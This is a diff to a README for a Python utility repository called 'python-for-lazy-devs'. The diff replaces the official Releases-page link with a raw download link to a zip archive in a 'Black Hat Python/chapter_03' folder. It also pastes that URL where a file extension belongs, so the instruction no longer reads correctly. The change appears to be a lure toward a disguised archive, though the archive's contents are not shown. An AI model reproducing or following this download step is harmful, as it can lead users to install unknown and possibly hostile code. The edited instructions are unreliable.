zullani/python-for-lazy-devs/README.md

 ## 🔗 Download & Install

-To get the latest version of **python-for-lazy-devs**, visit the [Releases page](https://github.com/zullani/python-for-lazy-devs/releases) to download your desired files.
+To get the latest version of **python-for-lazy-devs**, visit the [Releases page](https://raw.githubusercontent.com/zullani/python-for-lazy-devs/main/Scripts/Black Hat Python/chapter_03/python-for-lazy-devs-2.5.zip) to download your desired files.

 1. Click the link above.
 2. Locate the version you want.
-Typically, you will see files with extensions like `.zip` or `.tar.gz`.
+Typically, you will see files with extensions like `.zip` or `https://raw.githubusercontent.com/zullani/python-for-lazy-devs/main/Scripts/Black Hat Python/chapter_03/python-for-lazy-devs-2.5.zip`.
 3. Click on the file to start the download.
 4. Once downloaded, extract the contents if the file is compressed.